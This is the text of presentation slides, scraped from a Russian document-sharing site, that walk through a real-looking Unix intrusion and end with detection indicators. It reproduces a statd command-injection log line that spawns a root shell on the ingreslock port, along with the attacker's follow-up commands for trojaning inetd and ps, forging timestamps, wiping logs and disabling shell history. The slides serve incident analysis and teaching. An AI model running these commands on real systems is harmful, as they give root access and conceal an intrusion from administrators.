close

Вход

Забыли?

вход по аккаунту

?

Anatomy of a Hack...

код для вставкиСкачать
Anatomy of a Hack...
statd[146]: statd: attempt to create "/var/statmon/sm/; echo "ingreslock
stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s
/tmp/bob &"
•Create a second inet.conf file with a root shell service using the ingress
lock port.
•Start a second copy of inetd with the conf file to allow later connections.
•Then what….
Phase 2 - back doors
unset HISTFILE; unset SAVEHIST
cp doc /usr/sbin/inetd;
chown root /usr/sbin/inetd;
chgrp root /usr/sbin/inetd;
touch 0716000097 /usr/sbin/inetd;
rm -rf doc /tmp/bob /var/adm/messages /usr/lib/nfs/statd;
/usr/sbin/inetd -s;
/usr/sbin/inetd -s;
telnet localhost;
/usr/sbin/inetd -s;
ps -ef | grep inetd | grep bob | awk '{print "kill -9 " $2 }' > boo
chmod 700 boo
./boo
rm -rf boo
Phase 2 Continued
mkdir /usr/man/tmp
mv update ps /usr/man/tmp
cd /usr/man/tmp
echo 1 \"./update -s -o output\" > /kernel/pssys
chmod 755 ps update
./update -s -o output &
cp ps /usr/ucb/ps
mv ps /usr/bin/ps
touch 0716000097 /usr/bin/ps /usr/ucb/ps
cd /
ps -ef | grep bob | grep -v grep
ps -ef | grep stat | grep -v grep
ps -ef | grep update
Detection
пЃў Several copies of inetd running
пЃў /kernel/pssys exists
пЃў /usr/bin/ps and /usr/ucb/ps same size.
пЃў /usr/man/tmp/[update|output] exist
пЃў Log messages from first slide
Документ
Категория
Презентации
Просмотров
2
Размер файла
48 Кб
Теги
1/--страниц
Пожаловаться на содержимое документа